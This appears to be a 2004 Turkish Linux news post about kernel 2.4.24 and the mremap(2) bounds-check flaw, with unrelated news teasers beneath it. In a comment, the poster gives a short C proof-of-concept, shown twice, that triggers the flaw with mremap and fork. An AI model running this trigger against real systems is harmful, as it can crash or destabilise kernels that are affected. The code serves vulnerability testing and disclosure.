Kernel 2.4.24 Çıktı

0
bahadirkandemir
bahadirkandemir
6 Ocak 2004 , 1 dakika okuma süresi
Kernel'in bellek yönetim kodunda, mremap(2) sistem çağrısındaki hatalı sınır kontrolünden kaynaklanan bir güvenlik zayıflığı bulundu.

mremap sistem çağrısı, sanal bellek alanlarının adreslenebilir boşluklarını taşımak ve boyutlarını değiştirme imkanı sağlıyor.

Duyurunun tamamı: http://isec.pl/vulnerabilities/isec-0013-mremap.txt
linux
3
Linkedin Facebook Twitter Google plus

Görüşler

bahadirkandemir
0
bahadirkandemir
NOT: Bu zayıflığın 2.2, 2.4 ver 2.6 serilerinde olduğu belirtilmişti ancak, zayıflığı keşfeden güvenlik grubu bu açığın MREMAP_FIXED bayrağını desteklemeyen 2.2 serilerinde olmadığını önemli güvenlik listelerinde duyurdu.

Kernel 2.6.0'da aynı zayıflığın olduğu duyurulmuştu, 2.6.1-rc1'de zayıflığın giderilmediği, 2.6.1-rc2'de giderildiği ek bir açıklama ile duyuruldu.

Zayıflığı test etmek isteyenler aşağıdaki kodu deneyebilir:

#include
#include
#include
#include

#define MREMAP_MAYMOVE 1
#define MREMAP_FIXED 2

#define __NR_real_mremap __NR_mremap

static inline _syscall5( void *, real_mremap, void *, old_address,
size_t, old_size, size_t, new_size,
unsigned long, flags, void *, new_address );

int main( void )
{
void *base;

base = mmap( NULL, 8192, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 );

real_mremap( base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED,
(void *) 0xC0000000 );

fork();

return( 0 );
}
realist
0
realist
ne #include ediyoruz?
hangi #include ?
bahadirkandemir
0
bahadirkandemir
Sanırım < ve > karakterleri sorun yarattı. 2 kere önizleme yapmamdan kaynaklandı.

----------------------------------------------

#include <asm/unistd.h>
#include <sys/mman.h>
#include <unistd.h>
#include <errno.h>

#define MREMAP_MAYMOVE 1
#define MREMAP_FIXED 2

#define __NR_real_mremap __NR_mremap

static inline _syscall5( void *, real_mremap, void *, old_address,
size_t, old_size, size_t, new_size,
unsigned long, flags, void *, new_address );

int main( void )
{
void *base;

base = mmap( NULL, 8192, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 );

real_mremap( base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED,
(void *) 0xC0000000 );

fork();

return( 0 );
}
Görüş belirtmek için giriş yapın...

İlgili Yazılar

Chip Özel Sayısı: Red Hat 9.0 Beta!
anonim
20 Nisan 2003, 1 dakika okuma süresi

Chip Dergisi bu ay çıkarttığı özel sayısında, Red Hat 9.0 Beta'yı veriyor.

Gazete bayilerinde 9,5 milyona satılmakta olan bu sayıda neden 9.0'ın kendisini değil de Betasının verildiği, dahası bunun neden derginin hiçbir yerinde belirtilmeyip, ancak kuruluma başlayınca görülebildiği bir soru işareti.

Bir başka soru işareti de, 'Dünyada ilk defa bir dergi RedHat 9.0'ı çıkar çıkmaz veriyor'ifadesinde. Bilindiği üzere RedHat firması ismin imtiyaz sahibi ve ondan izin alınmadan RedHat adı altında bu dağıtımın dağıtılması kesinlikle yasak. Peki Chip bu işi nasıl yaptı ?
Az önce aldığımız bir habere göre Vogel, Chip Özel Sayısını piyasadan çekmek için harekete geçmiş! Şu anda derginin dağıtılmış sayıları bayilerden toplanıyor!

Mandrake 9.2 Beta 1 Çıktı
Teorisyen
25 Temmuz 2003, 1 dakika okuma süresi

Mandrakenin resmi linux sitesinde yayınlanan bu habere göre Mandrake Linux 9.2 Beta 1 yayınlanmış...

Looking Glass 3D Live CD'de
sfp
20 Nisan 2005, 1 dakika okuma süresi

Sun Microsystems'in geliştirdiği "masaüstü kavramında devrim" diye tabir edilen Java tabanlı Looking Glass 3D KNOPPIX tabanlı live cd ile teste sunuldu.

Linux`da KYLIX ile Görsel ve Hızlı Programlama
FZ
30 Mart 2001, 1 dakika okuma süresi

Bilgi işlem camiasındaki öncü şirket Borland'ı tanımayan, bilmeyen yoktur herhalde programcılar arasında.

Görülen o ki Borland firması gene bir öncü olarak Linux yazılım geliştirme dünyasında nicedir eksikliği çekilen (Java araçlarını saymazsak) Görsel Hızlı Program Geliştirme (VRAD - Visual Rapid Application Development) aracı olan Kylix'i piyasaya sürdü. Bir nevi Delphi for Linux olan bu aracın Linux yazılım dünyasını nasıl etkileyeceğini göreceğiz bir süre sonra.

WineX 2.0; Tabuta Bir Çivi Daha ;)
sundance
18 Nisan 2002, 1 dakika okuma süresi

Transgaming özellikle DirectX konusunda iyi çalışması hedeflenen Wine versionu WineX`in yeni versionunu çıkarttı.

\r \r DirectX 8.1 destekleyen bu version denediğim kadarıyla Wolfenstein, Homeworld ve Starcraft`ı sorunsuz çalıştırıyor. Eğer nVidia grafik kartınız varsa hem DirectX, hem de OpenGL altında Windows`daki FPS oranlarını yakalıyorsunuz. Dahası DirectX kullanmayan bir çok Windows 98 uygulamasını da gayet iyi çalıştırabiliyorsunuz

\r \r WineX 2.0 paketleri şu an için sadece kayıtlı üyeler için. Ama source indirip compile edebilirsiniz. Unutmadan, tahmin edebileceğiniz gibi site SLASHDOTTED ;)